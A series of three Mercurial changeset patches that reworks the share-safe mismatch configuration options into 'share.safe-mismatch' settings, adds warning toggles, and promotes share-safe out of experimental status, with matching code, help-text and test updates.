# HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610986040 -19800 # Mon Jan 18 21:37:20 2021 +0530 # Node ID cc3452d2dfa49c603055804f6fb80cd45ef25b1d # Parent 8788981c95f86877a26a15494aca6e382f897dfa share: rework config options to be much clearer and easier Recently I implemented various boolean configs which control how to behave when there is a share-safe mismatch between source and share repository. Mismatch means that source supports share-safe where as share does not or vice versa. However, while discussion and documentation we realized that it's too complicated and there are some combinations of values which makes no sense. We decided to introduce a config option with 4 possible values which makes controlling and understanding things easier. The config option `share.safe-mismatch.source-{not-}safe` can have following 4 values: * abort (default): error out if there is mismatch * allow: allow to work with respecting share source configuration * {up|down}grade-abort: try to {up|down}grade, if it fails, abort * {up|down}grade-allow: try to {up|down}grade, if it fails, continue in allow mode I am not sure if I can explain 3 config options which I deleted right now in just 5 lines which is a sign of how complex they became. No test changes demonstrate that functionality is same, only names have changed. 
Differential Revision: https://phab.mercurial-scm.org/D9785 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1098,21 +1098,6 @@ ) coreconfigitem( b'experimental', - b'sharesafe-auto-downgrade-shares', - default=False, -) -coreconfigitem( - b'experimental', - b'sharesafe-auto-upgrade-shares', - default=False, -) -coreconfigitem( - b'experimental', - b'sharesafe-auto-upgrade-fail-error', - default=False, -) -coreconfigitem( - b'experimental', b'sharesafe-warn-outdated-shares', default=True, ) @@ -1926,6 +1911,16 @@ default=b'identity', ) coreconfigitem( + b'share', + b'safe-mismatch.source-not-safe', + default=b'abort', +) +coreconfigitem( + b'share', + b'safe-mismatch.source-safe', + default=b'abort', +) +coreconfigitem( b'shelve', b'maxbackups', default=10, diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1932,6 +1932,39 @@ Currently, only the rebase and absorb commands consider this configuration. (EXPERIMENTAL) +``share`` +--------- + +``safe-mismatch.source-safe`` + + Controls what happens when the shared repository does not use the + share-safe mechanism but its source repository does. + + Possible values are `abort` (default), `allow`, `upgrade-abort` and + `upgrade-allow`. + `abort`: Disallows running any command and aborts + `allow`: Respects the feature presence in the share source + `upgrade-abort`: tries to upgrade the share to use share-safe; + if it fails, aborts + `upgrade-allow`: tries to upgrade the share; if it fails, continue by + respecting the share source setting + +``safe-mismatch.source-not-safe`` + + Controls what happens when the shared repository uses the share-safe + mechanism but its source does not. + + Possible values are `abort` (default), `allow`, `downgrade-abort` and + `downgrade-allow`. 
+ `abort`: Disallows running any command and aborts + `allow`: Respects the feature presence in the share source + `downgrade-abort`: tries to downgrade the share to not use share-safe; + if it fails, aborts + `downgrade-allow`: tries to downgrade the share to not use share-safe; + if it fails, continue by respecting the shared + source setting + + ``storage`` ----------- diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -575,8 +575,13 @@ and requirementsmod.SHARESAFE_REQUIREMENT not in _readrequires(sharedvfs, True) ): - if ui.configbool( - b'experimental', b'sharesafe-auto-downgrade-shares' + mismatch_config = ui.config( + b'share', b'safe-mismatch.source-not-safe' + ) + if mismatch_config in ( + b'downgrade-allow', + b'allow', + b'downgrade-abort', ): # prevent cyclic import localrepo -> upgrade -> localrepo from . import upgrade @@ -586,19 +591,38 @@ hgvfs, sharedvfs, requirements, + mismatch_config, ) - else: + elif mismatch_config == b'abort': raise error.Abort( _( b"share source does not support exp-sharesafe requirement" ) ) + else: + hint = _( + "run `hg help config.share.safe-mismatch.source-not-safe`" + ) + raise error.Abort( + _( + b"share-safe mismatch with source.\nUnrecognized" + b" value '%s' of `share.safe-mismatch.source-not-safe`" + b" set." + ) + % mismatch_config, + hint=hint, + ) else: requirements |= _readrequires(storevfs, False) elif shared: sourcerequires = _readrequires(sharedvfs, False) if requirementsmod.SHARESAFE_REQUIREMENT in sourcerequires: - if ui.configbool(b'experimental', b'sharesafe-auto-upgrade-shares'): + mismatch_config = ui.config(b'share', b'safe-mismatch.source-safe') + if mismatch_config in ( + b'upgrade-allow', + b'allow', + b'upgrade-abort', + ): # prevent cyclic import localrepo -> upgrade -> localrepo from . 
import upgrade @@ -607,14 +631,25 @@ hgvfs, storevfs, requirements, + mismatch_config, ) - else: + elif mismatch_config == b'abort': raise error.Abort( _( b'version mismatch: source uses share-safe' b' functionality while the current share does not' ) ) + else: + hint = _("run `hg help config.share.safe-mismatch.source-safe`") + raise error.Abort( + _( + b"share-safe mismatch with source.\nUnrecognized" + b" value '%s' of `share.safe-mismatch.source-safe` set." + ) + % mismatch_config, + hint=hint, + ) # The .hg/hgrc file may load extensions or contain config options # that influence repository construction. Attempt to load it and diff --git a/mercurial/upgrade.py b/mercurial/upgrade.py --- a/mercurial/upgrade.py +++ b/mercurial/upgrade.py @@ -241,7 +241,9 @@ upgrade_op.print_post_op_messages() -def upgrade_share_to_safe(ui, hgvfs, storevfs, current_requirements): +def upgrade_share_to_safe( + ui, hgvfs, storevfs, current_requirements, mismatch_config +): """Upgrades a share to use share-safe mechanism""" wlock = None store_requirements = localrepo._readrequires(storevfs, False) @@ -253,6 +255,10 @@ # add share-safe requirement as it will mark the share as share-safe diffrequires.add(requirementsmod.SHARESAFE_REQUIREMENT) current_requirements.add(requirementsmod.SHARESAFE_REQUIREMENT) + # in `allow` case, we don't try to upgrade, we just respect the source + # state, update requirements and continue + if mismatch_config == b'allow': + return try: wlock = lockmod.trylock(ui, hgvfs, b'wlock', 0, 0) # some process might change the requirement in between, re-read @@ -271,7 +277,7 @@ scmutil.writerequires(hgvfs, diffrequires) ui.warn(_(b'repository upgraded to use share-safe mode\n')) except error.LockError as e: - if ui.configbool(b'experimental', b'sharesafe-auto-upgrade-fail-error'): + if mismatch_config == b'upgrade-abort': raise error.Abort( _(b'failed to upgrade share, got error: %s') % stringutil.forcebytestr(e.strerror) @@ -291,6 +297,7 @@ hgvfs, sharedvfs, 
current_requirements, + mismatch_config, ): """Downgrades a share which use share-safe to not use it""" wlock = None @@ -302,6 +309,8 @@ source_requirements -= requirementsmod.WORKING_DIR_REQUIREMENTS current_requirements |= source_requirements current_requirements.remove(requirementsmod.SHARESAFE_REQUIREMENT) + if mismatch_config == b'allow': + return try: wlock = lockmod.trylock(ui, hgvfs, b'wlock', 0, 0) @@ -319,12 +328,13 @@ scmutil.writerequires(hgvfs, current_requirements) ui.warn(_(b'repository downgraded to not use share-safe mode\n')) except error.LockError as e: - # raise error right away because if downgrade failed, we cannot load - # the repository because it does not have complete set of requirements - raise error.Abort( - _(b'failed to downgrade share, got error: %s') - % stringutil.forcebytestr(e.strerror) - ) + # If downgrade-abort is set, abort when downgrade fails, else let the + # process continue as `downgrade-allow` is set + if mismatch_config == b'downgrade-abort': + raise error.Abort( + _(b'failed to downgrade share, got error: %s') + % stringutil.forcebytestr(e.strerror) + ) finally: if wlock: wlock.release() diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -486,12 +486,12 @@ Testing automatic downgrade of shares when config is set $ touch ../ss-share/.hg/wlock - $ hg log -GT "{node}: {desc}\n" -R ../ss-share --config experimental.sharesafe-auto-downgrade-shares=true + $ hg log -GT "{node}: {desc}\n" -R ../ss-share --config share.safe-mismatch.source-not-safe=downgrade-abort abort: failed to downgrade share, got error: Lock held [255] $ rm ../ss-share/.hg/wlock - $ hg log -GT "{node}: {desc}\n" -R ../ss-share --config experimental.sharesafe-auto-downgrade-shares=true + $ hg log -GT "{node}: {desc}\n" -R ../ss-share --config share.safe-mismatch.source-not-safe=downgrade-abort repository downgraded to not use share-safe mode @ f63db81e6dde1d9c78814167f77fb1fb49283f4f: added 
bar | @@ -533,26 +533,31 @@ [255] Check that if lock is taken, upgrade fails but read operation are successful + $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgra + abort: share-safe mismatch with source. + Unrecognized value 'upgra' of `share.safe-mismatch.source-safe` set. + (run `hg help config.share.safe-mismatch.source-safe`) + [255] $ touch ../nss-share/.hg/wlock - $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config experimental.sharesafe-auto-upgrade-shares=true + $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-allow failed to upgrade share, got error: Lock held @ f63db81e6dde1d9c78814167f77fb1fb49283f4f: added bar | o f3ba8b99bb6f897c87bbc1c07b75c6ddf43a4f77: added foo - $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config experimental.sharesafe-auto-upgrade-shares=true --config experimental.sharesafe-warn-outdated-shares=false + $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-allow --config experimental.sharesafe-warn-outdated-shares=false @ f63db81e6dde1d9c78814167f77fb1fb49283f4f: added bar | o f3ba8b99bb6f897c87bbc1c07b75c6ddf43a4f77: added foo - $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config experimental.sharesafe-auto-upgrade-shares=true --config experimental.sharesafe-auto-upgrade-fail-error=true + $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-abort abort: failed to upgrade share, got error: Lock held [255] $ rm ../nss-share/.hg/wlock - $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config experimental.sharesafe-auto-upgrade-shares=true + $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-abort repository upgraded to use share-safe mode @ f63db81e6dde1d9c78814167f77fb1fb49283f4f: added bar | # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610692687 -19800 # Fri Jan 15 
12:08:07 2021 +0530 # Node ID 2eb5fe13461b81dc20468885deeb7cbe44240eea # Parent cc3452d2dfa49c603055804f6fb80cd45ef25b1d share: rename share-safe warning config Config introduced in previous patch was `share.source-safe-mismatch`. Let's rename the warn as `share.source-safe-mismatch.warn`. While we are here, made sure we have different configs for upgrade and downgrade. Differential Revision: https://phab.mercurial-scm.org/D9786 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1098,11 +1098,6 @@ ) coreconfigitem( b'experimental', - b'sharesafe-warn-outdated-shares', - default=True, -) -coreconfigitem( - b'experimental', b'single-head-per-branch', default=False, ) @@ -1921,6 +1916,16 @@ default=b'abort', ) coreconfigitem( + b'share', + b'safe-mismatch.source-not-safe.warn', + default=True, +) +coreconfigitem( + b'share', + b'safe-mismatch.source-safe.warn', + default=True, +) +coreconfigitem( b'shelve', b'maxbackups', default=10, diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1965,6 +1965,16 @@ source setting +``safe-mismatch.source-safe.warn`` + Shows a warning on operations if the shared repository does not use + share-safe, but the source repository does. + (default: True) + +``safe-mismatch.source-not-safe.warn`` + Shows a warning on operations if the shared repository uses share-safe, + but the source repository does not. 
+ (default: True) + ``storage`` ----------- diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -575,6 +575,9 @@ and requirementsmod.SHARESAFE_REQUIREMENT not in _readrequires(sharedvfs, True) ): + mismatch_warn = ui.configbool( + b'share', b'safe-mismatch.source-not-safe.warn' + ) mismatch_config = ui.config( b'share', b'safe-mismatch.source-not-safe' ) @@ -592,6 +595,7 @@ sharedvfs, requirements, mismatch_config, + mismatch_warn, ) elif mismatch_config == b'abort': raise error.Abort( @@ -618,6 +622,9 @@ sourcerequires = _readrequires(sharedvfs, False) if requirementsmod.SHARESAFE_REQUIREMENT in sourcerequires: mismatch_config = ui.config(b'share', b'safe-mismatch.source-safe') + mismatch_warn = ui.configbool( + b'share', b'safe-mismatch.source-safe.warn' + ) if mismatch_config in ( b'upgrade-allow', b'allow', @@ -632,6 +639,7 @@ storevfs, requirements, mismatch_config, + mismatch_warn, ) elif mismatch_config == b'abort': raise error.Abort( diff --git a/mercurial/upgrade.py b/mercurial/upgrade.py --- a/mercurial/upgrade.py +++ b/mercurial/upgrade.py @@ -242,7 +242,12 @@ def upgrade_share_to_safe( - ui, hgvfs, storevfs, current_requirements, mismatch_config + ui, + hgvfs, + storevfs, + current_requirements, + mismatch_config, + mismatch_warn, ): """Upgrades a share to use share-safe mechanism""" wlock = None @@ -282,7 +287,7 @@ _(b'failed to upgrade share, got error: %s') % stringutil.forcebytestr(e.strerror) ) - elif ui.configbool(b'experimental', b'sharesafe-warn-outdated-shares'): + elif mismatch_warn: ui.warn( _(b'failed to upgrade share, got error: %s\n') % stringutil.forcebytestr(e.strerror) @@ -298,6 +303,7 @@ sharedvfs, current_requirements, mismatch_config, + mismatch_warn, ): """Downgrades a share which use share-safe to not use it""" wlock = None @@ -335,6 +341,11 @@ _(b'failed to downgrade share, got error: %s') % stringutil.forcebytestr(e.strerror) ) + elif mismatch_warn: + ui.warn( 
+ _(b'failed to downgrade share, got error: %s\n') + % stringutil.forcebytestr(e.strerror) + ) finally: if wlock: wlock.release() diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -546,7 +546,7 @@ o f3ba8b99bb6f897c87bbc1c07b75c6ddf43a4f77: added foo - $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-allow --config experimental.sharesafe-warn-outdated-shares=false + $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-allow --config share.safe-mismatch.source-safe.warn=False @ f63db81e6dde1d9c78814167f77fb1fb49283f4f: added bar | o f3ba8b99bb6f897c87bbc1c07b75c6ddf43a4f77: added foo # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610977609 -19800 # Mon Jan 18 19:16:49 2021 +0530 # Node ID 4b0192f592cf1962576ef6b6bc688bd11ac2cbd6 # Parent 2eb5fe13461b81dc20468885deeb7cbe44240eea share: move share safe functionality out of experimental The share-safe functionality is complete and all configuration options are implemented. The behavior is well discussed on mailing list and in reviews. Let's unmark this as experimental to solve a chicken and egg issue. Differential Revision: https://phab.mercurial-scm.org/D9823 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1272,9 +1272,8 @@ ) coreconfigitem( b'format', - b'exp-share-safe', + b'use-share-safe', default=False, - experimental=True, ) coreconfigitem( b'format', diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -914,6 +914,12 @@ Disabled by default. +``use-share-safe`` + Enable or disable the "share-safe" functionality, which enables shares + to read requirements and configuration of its source repository. + + Disabled by default. 
+ ``usestore`` Enable or disable the "store" repository format which improves compatibility with systems that fold case or otherwise mangle diff --git a/mercurial/helptext/internals/requirements.txt b/mercurial/helptext/internals/requirements.txt --- a/mercurial/helptext/internals/requirements.txt +++ b/mercurial/helptext/internals/requirements.txt @@ -159,10 +159,6 @@ exp-sharesafe ============= -NOTE: This requirement is for internal development only. The semantics are not -frozed yet, the feature is experimental. It's not advised to use it for any -production repository yet. - Represents that the repository can be shared safely. Requirements and config of the source repository will be shared. Requirements are stored in ``.hg/store`` instead of directly in ``.hg/`` where @@ -172,5 +168,5 @@ Support for this requirement was added in Mercurial 5.7 (released February 2021). The requirement will only be present on repositories that have -opted in to this format (by having ``format.exp-share-safe=true`` set when +opted in to this format (by having ``format.use-share-safe=true`` set when they were created). 
diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -3474,7 +3474,7 @@ # if share-safe is enabled, let's create the new repository with the new # requirement - if ui.configbool(b'format', b'exp-share-safe'): + if ui.configbool(b'format', b'use-share-safe'): requirements.add(requirementsmod.SHARESAFE_REQUIREMENT) return requirements @@ -3513,7 +3513,7 @@ if requirementsmod.SHARESAFE_REQUIREMENT in requirements: ui.warn( _( - b"ignoring enabled 'format.exp-share-safe' config because " + b"ignoring enabled 'format.use-share-safe' config because " b"it is incompatible with disabled 'format.usestore'" b" config\n" ) diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -55,7 +55,7 @@ # A repository with share implemented safely. The repository has different # store and working copy requirements i.e. both `.hg/requires` and # `.hg/store/requires` are present. 
-SHARESAFE_REQUIREMENT = b'exp-sharesafe' +SHARESAFE_REQUIREMENT = b'share-safe' # List of requirements which are working directory specific # These requirements cannot be shared between repositories if they diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -237,7 +237,7 @@ @registerformatvariant class sharesafe(requirementformatvariant): - name = b'exp-sharesafe' + name = b'share-safe' _requirement = requirements.SHARESAFE_REQUIREMENT default = False diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -696,7 +696,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no yes no persistent-nodemap: no no no diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -37,7 +37,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes yes no persistent-nodemap: no no no @@ -51,7 +51,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -419,7 +419,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes yes no persistent-nodemap: no no no @@ -445,7 +445,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes yes no persistent-nodemap: no no no @@ -473,7 +473,7 @@ fncache: yes yes yes 
dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes yes no persistent-nodemap: no no no diff --git a/tests/test-help.t b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -1553,6 +1553,8 @@ "use-persistent-nodemap" + "use-share-safe" + "usestore" "sparse-revlog" diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -37,7 +37,7 @@ fncache: yes dotencode: yes generaldelta: yes - exp-sharesafe: no + share-safe: no sparserevlog: yes sidedata: no persistent-nodemap: yes @@ -556,7 +556,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: yes no no @@ -592,7 +592,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no yes no diff --git a/tests/test-share-bookmarks.t b/tests/test-share-bookmarks.t --- a/tests/test-share-bookmarks.t +++ b/tests/test-share-bookmarks.t @@ -3,7 +3,7 @@ #if safe $ echo "[format]" >> $HGRCPATH - $ echo "exp-share-safe = True" >> $HGRCPATH + $ echo "use-share-safe = True" >> $HGRCPATH #endif $ echo "[extensions]" >> $HGRCPATH @@ -290,4 +290,4 @@ $ hg init brokenrepo --config format.bookmarks-in-store=True --config format.usestore=false ignoring enabled 'format.bookmarks-in-store' config beacuse it is incompatible with disabled 'format.usestore' config - ignoring enabled 'format.exp-share-safe' config because it is incompatible with disabled 'format.usestore' config (safe !) + ignoring enabled 'format.use-share-safe' config because it is incompatible with disabled 'format.usestore' config (safe !) 
diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -4,7 +4,7 @@ > [extensions] > share = > [format] - > exp-share-safe = True + > use-share-safe = True > [storage] > revlog.persistent-nodemap.slow-path=allow > EOF @@ -14,7 +14,7 @@ $ hg init source $ cd source $ cat .hg/requires - exp-sharesafe + share-safe $ cat .hg/store/requires dotencode fncache @@ -24,10 +24,10 @@ store $ hg debugrequirements dotencode - exp-sharesafe fncache generaldelta revlogv1 + share-safe sparserevlog store @@ -47,24 +47,24 @@ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cd shared1 $ cat .hg/requires - exp-sharesafe + share-safe shared $ hg debugrequirements -R ../source dotencode - exp-sharesafe fncache generaldelta revlogv1 + share-safe sparserevlog store $ hg debugrequirements dotencode - exp-sharesafe fncache generaldelta revlogv1 + share-safe shared sparserevlog store @@ -214,7 +214,7 @@ upgrade will perform the following actions: requirements - preserved: dotencode, exp-sharesafe, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, share-safe, sparserevlog, store added: revlog-compression-zstd processed revlogs: @@ -240,8 +240,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, exp-sharesafe, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) - preserved: dotencode, exp-sharesafe, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) + preserved: dotencode, fncache, generaldelta, revlogv1, share-safe, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, share-safe, sparserevlog, store (zstd !) 
added: persistent-nodemap processed revlogs: @@ -310,7 +310,7 @@ Test that upgrading using debugupgraderepo works ================================================= - $ hg init non-share-safe --config format.exp-share-safe=false + $ hg init non-share-safe --config format.use-share-safe=false $ cd non-share-safe $ hg debugrequirements dotencode @@ -345,7 +345,7 @@ $ hg debugupgraderepo -q requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store - added: exp-sharesafe + added: share-safe processed revlogs: - all-filelogs @@ -357,7 +357,7 @@ requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store - added: exp-sharesafe + added: share-safe processed revlogs: - all-filelogs @@ -368,15 +368,15 @@ $ hg debugrequirements dotencode - exp-sharesafe fncache generaldelta revlogv1 + share-safe sparserevlog store $ cat .hg/requires - exp-sharesafe + share-safe $ cat .hg/store/requires dotencode @@ -419,13 +419,13 @@ > [extensions] > share = > [format] - > exp-share-safe = False + > use-share-safe = False > EOF $ hg debugupgraderepo -q requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store - removed: exp-sharesafe + removed: share-safe processed revlogs: - all-filelogs @@ -437,7 +437,7 @@ requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store - removed: exp-sharesafe + removed: share-safe processed revlogs: - all-filelogs @@ -507,12 +507,12 @@ Testing automatic upgrade of shares when config is set - $ hg debugupgraderepo -q --run --config format.exp-share-safe=True + $ hg debugupgraderepo -q --run --config format.use-share-safe=True upgrade will perform the following actions: requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store - added: exp-sharesafe + added: share-safe processed revlogs: - all-filelogs @@ -522,10 +522,10 @@ repository upgraded to share safe mode, existing shares will still work in old non-safe mode. 
Re-share existing shares to use them in safe mode New shares will be created in safe mode. $ hg debugrequirements dotencode - exp-sharesafe fncache generaldelta revlogv1 + share-safe sparserevlog store $ hg log -GT "{node}: {desc}\n" -R ../nss-share diff --git a/tests/test-share.t b/tests/test-share.t --- a/tests/test-share.t +++ b/tests/test-share.t @@ -2,7 +2,7 @@ #if safe $ echo "[format]" >> $HGRCPATH - $ echo "exp-share-safe = True" >> $HGRCPATH + $ echo "use-share-safe = True" >> $HGRCPATH #endif $ echo "[extensions]" >> $HGRCPATH @@ -281,7 +281,7 @@ Test sharing a repository which was created with store requirement disable $ hg init nostore --config format.usestore=false - ignoring enabled 'format.exp-share-safe' config because it is incompatible with disabled 'format.usestore' config (safe !) + ignoring enabled 'format.use-share-safe' config because it is incompatible with disabled 'format.usestore' config (safe !) $ hg share nostore sharednostore abort: cannot create shared repository as source was created with 'format.usestore' config disabled [255] diff --git a/tests/test-sidedata.t b/tests/test-sidedata.t --- a/tests/test-sidedata.t +++ b/tests/test-sidedata.t @@ -54,7 +54,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -67,7 +67,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no yes no persistent-nodemap: no no no @@ -86,7 +86,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes no no persistent-nodemap: no no no @@ -99,7 +99,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: 
yes no no persistent-nodemap: no no no diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -56,7 +56,7 @@ fncache: yes dotencode: yes generaldelta: yes - exp-sharesafe: no + share-safe: no sparserevlog: yes sidedata: no persistent-nodemap: no @@ -69,7 +69,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -82,7 +82,7 @@ fncache: yes no yes dotencode: yes no yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -95,7 +95,7 @@ [formatvariant.name.mismatchconfig|fncache: ][formatvariant.repo.mismatchconfig| yes][formatvariant.config.special| no][formatvariant.default| yes] [formatvariant.name.mismatchconfig|dotencode: ][formatvariant.repo.mismatchconfig| yes][formatvariant.config.special| no][formatvariant.default| yes] [formatvariant.name.uptodate|generaldelta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|exp-sharesafe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|sparserevlog: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] @@ -126,7 +126,7 @@ { "config": false, "default": false, - "name": "exp-sharesafe", + "name": 
"share-safe", "repo": false }, { @@ -301,7 +301,7 @@ fncache: no dotencode: no generaldelta: no - exp-sharesafe: no + share-safe: no sparserevlog: no sidedata: no persistent-nodemap: no @@ -314,7 +314,7 @@ fncache: no yes yes dotencode: no yes yes generaldelta: no yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: no yes yes sidedata: no no no persistent-nodemap: no no no @@ -327,7 +327,7 @@ fncache: no yes yes dotencode: no yes yes generaldelta: no no yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: no no yes sidedata: no no no persistent-nodemap: no no no @@ -340,7 +340,7 @@ [formatvariant.name.mismatchconfig|fncache: ][formatvariant.repo.mismatchconfig| no][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.mismatchconfig|dotencode: ][formatvariant.repo.mismatchconfig| no][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.mismatchdefault|generaldelta: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] - [formatvariant.name.uptodate|exp-sharesafe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.mismatchdefault|sparserevlog: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] @@ -1297,7 +1297,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no 
